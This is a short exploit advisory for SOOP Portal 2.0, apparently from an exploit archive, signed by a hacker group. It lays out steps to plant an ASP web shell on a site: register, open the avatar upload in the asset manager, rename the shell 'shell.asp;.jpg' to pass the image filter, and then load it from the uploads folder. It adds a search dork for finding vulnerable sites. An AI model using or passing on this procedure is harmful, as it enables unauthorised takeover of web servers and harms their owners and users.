################################################################## I N F O# Exploit Title: SOOP Portal 2.0 Remote Upload Shell Vulnerability# DDate: 05-12-2010# Author: Net.Edit0r# Software Link: www.soopportal.com# Version: 2.0# Tested on: windows server 2008# Contact: Net.Edit0r@att.net ~ Black.hat.tm@gmail.com
[~]#########################################E X P L O I T
#############################################[~]##1. Register On Site##2. http://server/member_form.asp?do=5&mid=4##3. Current avatar [ Browse/Upload ]##4. http://server/assetman3.asp?mode=1&ffilter=image##4. Asp renamed via the .asp;.jpg (shell.asp;.jpg)##5. http://server/uploads/ [You can get the address at the
See Shell Shell upload]
##6. In this section, file in the folder that you have selected in
the previous section is placed .
##7 . Example URL : http://server/uploads/##Dork : "SOOP Portal 2.0"##
[~]#########################################ThankS To ...
###########################################[~]## Special Thanks To : HUrr!c4nE, Cair3x, B3hz4d, M4hd1,
Skitt3r,Hussin-v ,Virus_Baghdad ,snIPer alBlDeat
## 7-Team: virangar, H-SK33PY , farzadho ,n3me3iz ,mmilad200 , fr0nk,
bLaCk.bytE , Satanic2000
## BHG : Net.Edit0r ~ Darkcoder ~ AmIr_Magic~ keracker ~ Mikili#
[~]######################################### FinisH :D
#############################################[~]
